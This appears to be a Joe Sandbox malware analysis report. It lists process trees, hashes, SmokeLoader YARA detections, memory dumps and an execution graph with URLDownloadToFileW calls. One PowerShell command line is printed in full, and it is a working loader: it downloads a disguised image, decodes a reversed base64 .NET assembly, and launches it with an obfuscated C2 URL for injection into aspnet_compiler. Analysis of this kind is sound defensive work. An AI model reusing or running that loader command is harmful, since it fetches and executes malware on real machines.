                                                                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                            Start time:05:08:57
                                                                                                                                                                                                            Start date:08/01/2025
                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.cmdline"
                                                                                                                                                                                                            Imagebase:0x3c0000
                                                                                                                                                                                                            File size:2'141'552 bytes
                                                                                                                                                                                                            MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                            Start time:05:08:57
                                                                                                                                                                                                            Start date:08/01/2025
                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2316.tmp" "c:\Users\user\AppData\Local\Temp\thj2bm0i\CSCE4BAB64F6B1C4E5BA339BD9879E79427.TMP"
                                                                                                                                                                                                            Imagebase:0x410000
                                                                                                                                                                                                            File size:46'832 bytes
                                                                                                                                                                                                            MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                            Start time:05:09:01
                                                                                                                                                                                                            Start date:08/01/2025
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS"
                                                                                                                                                                                                            Imagebase:0x670000
                                                                                                                                                                                                            File size:147'456 bytes
                                                                                                                                                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                            Start time:05:09:02
                                                                                                                                                                                                            Start date:08/01/2025
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
                                                                                                                                                                                                            Imagebase:0x1f0000
                                                                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                            Start time:05:09:02
                                                                                                                                                                                                            Start date:08/01/2025
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                            Start time:05:09:23
                                                                                                                                                                                                            Start date:08/01/2025
                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                                                                                                                                                                            Imagebase:0x4e0000
                                                                                                                                                                                                            File size:56'368 bytes
                                                                                                                                                                                                            MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.2020789963.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000D.00000002.2020789963.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.2020378566.00000000009A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000D.00000002.2020378566.00000000009A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                            Start time:05:09:28
                                                                                                                                                                                                            Start date:08/01/2025
                                                                                                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                            Imagebase:0x7ff72b770000
                                                                                                                                                                                                            File size:5'141'208 bytes
                                                                                                                                                                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                            Start time:05:09:47
                                                                                                                                                                                                            Start date:08/01/2025
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\icgfugf
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\icgfugf
                                                                                                                                                                                                            Imagebase:0x730000
                                                                                                                                                                                                            File size:56'368 bytes
                                                                                                                                                                                                            MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                            Start time:05:09:48
                                                                                                                                                                                                            Start date:08/01/2025
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                            Start time:05:09:49
                                                                                                                                                                                                            Start date:08/01/2025
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                                                                            File size:4'514'184 bytes
                                                                                                                                                                                                            MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                            Start time:05:09:50
                                                                                                                                                                                                            Start date:08/01/2025
                                                                                                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\explorer.exe
                                                                                                                                                                                                            Imagebase:0x7ff72b770000
                                                                                                                                                                                                            File size:5'141'208 bytes
                                                                                                                                                                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                            Start time:05:09:51
                                                                                                                                                                                                            Start date:08/01/2025
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                                                                            File size:4'514'184 bytes
                                                                                                                                                                                                            MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                            Start time:05:09:52
                                                                                                                                                                                                            Start date:08/01/2025
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                                                                            File size:4'514'184 bytes
                                                                                                                                                                                                            MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                            Start time:05:09:54
                                                                                                                                                                                                            Start date:08/01/2025
                                                                                                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\explorer.exe
                                                                                                                                                                                                            Imagebase:0x7ff72b770000
                                                                                                                                                                                                            File size:5'141'208 bytes
                                                                                                                                                                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                            Start time:05:09:55
                                                                                                                                                                                                            Start date:08/01/2025
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                                                                            File size:4'514'184 bytes
                                                                                                                                                                                                            MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                                            Start time:05:09:55
                                                                                                                                                                                                            Start date:08/01/2025
                                                                                                                                                                                                            Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\WerFault.exe -u -p 7912 -s 420
                                                                                                                                                                                                            Imagebase:0x7ff6c25f0000
                                                                                                                                                                                                            File size:570'736 bytes
                                                                                                                                                                                                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                                            Start time:05:09:56
                                                                                                                                                                                                            Start date:08/01/2025
                                                                                                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\explorer.exe
                                                                                                                                                                                                            Imagebase:0x7ff72b770000
                                                                                                                                                                                                            File size:5'141'208 bytes
                                                                                                                                                                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000001A.00000002.2892796077.00000000005D1000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                                            Start time:05:09:57
                                                                                                                                                                                                            Start date:08/01/2025
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                                                                            File size:4'514'184 bytes
                                                                                                                                                                                                            MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                                            Start time:05:09:58
                                                                                                                                                                                                            Start date:08/01/2025
                                                                                                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\explorer.exe
                                                                                                                                                                                                            Imagebase:0x7ff72b770000
                                                                                                                                                                                                            File size:5'141'208 bytes
                                                                                                                                                                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                            Start time:05:10:01
                                                                                                                                                                                                            Start date:08/01/2025
                                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\icgfugf
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\icgfugf
                                                                                                                                                                                                            Imagebase:0x310000
                                                                                                                                                                                                            File size:56'368 bytes
                                                                                                                                                                                                            MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                                            Start time:05:10:01
                                                                                                                                                                                                            Start date:08/01/2025
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Reset < >
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000003.1656556301.0000000006510000.00000010.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_3_6510000_mshta.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: b28c77eea66f2fce201fb6c601c5fb27d1c06ce47093af01bdbf2bfea2e6268a
                                                                                                                                                                                                              • Instruction ID: 8cc7d309a0cd0ce47be4978e12fa89a092cdaf47a9a5acf518568022f512b70c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b28c77eea66f2fce201fb6c601c5fb27d1c06ce47093af01bdbf2bfea2e6268a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F111E974A403049FFB40CF98C982BBDF7F5BF89254F150859E501AB380DB748C418BA0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000003.1656541740.0000000006511000.00000010.00000800.00020000.00000000.sdmp, Offset: 06511000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_3_6511000_mshta.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: b02f52cf50ad2183be4154e6ca293ea642054f2e1ef80df3792a419d73dfa7ed
                                                                                                                                                                                                              • Instruction ID: a8e9976d9689a30a164f059c4a26d9467d75591baebe25b9c3e292916417e36c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b02f52cf50ad2183be4154e6ca293ea642054f2e1ef80df3792a419d73dfa7ed
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4711E675A403049FFBA08F9888827BDF7F5BF99750F150899E646EB340D6B4CC018B61
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000003.1656556301.0000000006510000.00000010.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_3_6510000_mshta.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 1126d2291d017ff4647c31cc1da85155d0e30a0b5179e2b8872d5c19b5e030df
                                                                                                                                                                                                              • Instruction ID: 9b63663b0dcf856d5ca224091f3718ca25e8df6915023177914a17b884a82765
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1126d2291d017ff4647c31cc1da85155d0e30a0b5179e2b8872d5c19b5e030df
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E11E5B1A443045FE7518FA88D41BBDFBFA6FA6340F29048AE101EB291DBB4CD418750
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000003.1656578803.0000000006430000.00000010.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_3_6430000_mshta.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                                                                                                                              • Instruction ID: a70cdd81a9da24e5ded983c4545267fbe608f66ebfd720f379f741bfd1398d73
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000003.1656578803.0000000006430000.00000010.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_3_6430000_mshta.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                                                                                                                              • Instruction ID: a70cdd81a9da24e5ded983c4545267fbe608f66ebfd720f379f741bfd1398d73
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                                                                                                                              • Instruction Fuzzy Hash:

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:3.8%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                              Signature Coverage:15.3%
                                                                                                                                                                                                              Total number of Nodes:59
                                                                                                                                                                                                              Total number of Limit Nodes:8
                                                                                                                                                                                                              execution_graph 9471 4987480 9472 49874be 9471->9472 9474 498764b 9472->9474 9479 4987da8 9472->9479 9484 4987c45 9472->9484 9493 4987a08 9472->9493 9503 4987a18 9472->9503 9473 49875df 9480 4987cf9 9479->9480 9480->9479 9513 74b45ad 9480->9513 9522 74b45f5 9480->9522 9530 74b4610 9480->9530 9485 4987b9a 9484->9485 9489 4987c5e 9484->9489 9485->9484 9486 4987de8 URLDownloadToFileW 9485->9486 9488 4987ea8 9486->9488 9488->9473 9490 74b45ad 3 API calls 9489->9490 9491 74b4610 3 API calls 9489->9491 9492 74b45f5 3 API calls 9489->9492 9490->9489 9491->9489 9492->9489 9497 4987a4c 9493->9497 9494 4987b30 9494->9473 9496 4987de8 URLDownloadToFileW 9498 4987ea8 9496->9498 9497->9494 9497->9496 9499 4987c5e 9497->9499 9498->9473 9500 74b45ad 3 API calls 9499->9500 9501 74b4610 3 API calls 9499->9501 9502 74b45f5 3 API calls 9499->9502 9500->9499 9501->9499 9502->9499 9507 4987a4c 9503->9507 9504 4987b30 9504->9473 9506 4987de8 URLDownloadToFileW 9508 4987ea8 9506->9508 9507->9504 9507->9506 9509 4987c5e 9507->9509 9508->9473 9510 74b45ad 3 API calls 9509->9510 9511 74b4610 3 API calls 9509->9511 9512 74b45f5 3 API calls 9509->9512 9510->9509 9511->9509 9512->9509 9514 74b45c6 9513->9514 9516 74b4633 9513->9516 9514->9480 9515 74b4a93 9515->9480 9516->9515 9518 4987a18 4 API calls 9516->9518 9519 4987a08 4 API calls 9516->9519 9521 4987c45 4 API calls 9516->9521 9538 4981bf8 9516->9538 9517 74b4a34 9517->9480 9518->9517 9519->9517 9521->9517 9524 74b4610 9522->9524 9523 74b4a93 9523->9480 9524->9523 9526 4987a18 4 API calls 9524->9526 9527 4987a08 4 API calls 9524->9527 9528 4981bf8 URLDownloadToFileW 9524->9528 9529 4987c45 4 API calls 9524->9529 9525 74b4a34 9525->9480 9526->9525 9527->9525 9528->9525 9529->9525 9531 74b4a93 9530->9531 9532 74b4641 9530->9532 9531->9480 9532->9531 9534 4987a18 4 API calls 9532->9534 9535 4987a08 4 API calls 9532->9535 9536 4981bf8 URLDownloadToFileW 9532->9536 9537 4987c45 4 API calls 9532->9537 9533 74b4a34 9533->9480 9534->9533 9535->9533 9536->9533 9537->9533 9539 4987dfa URLDownloadToFileW 9538->9539 9541 4987ea8 9539->9541 9541->9517

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
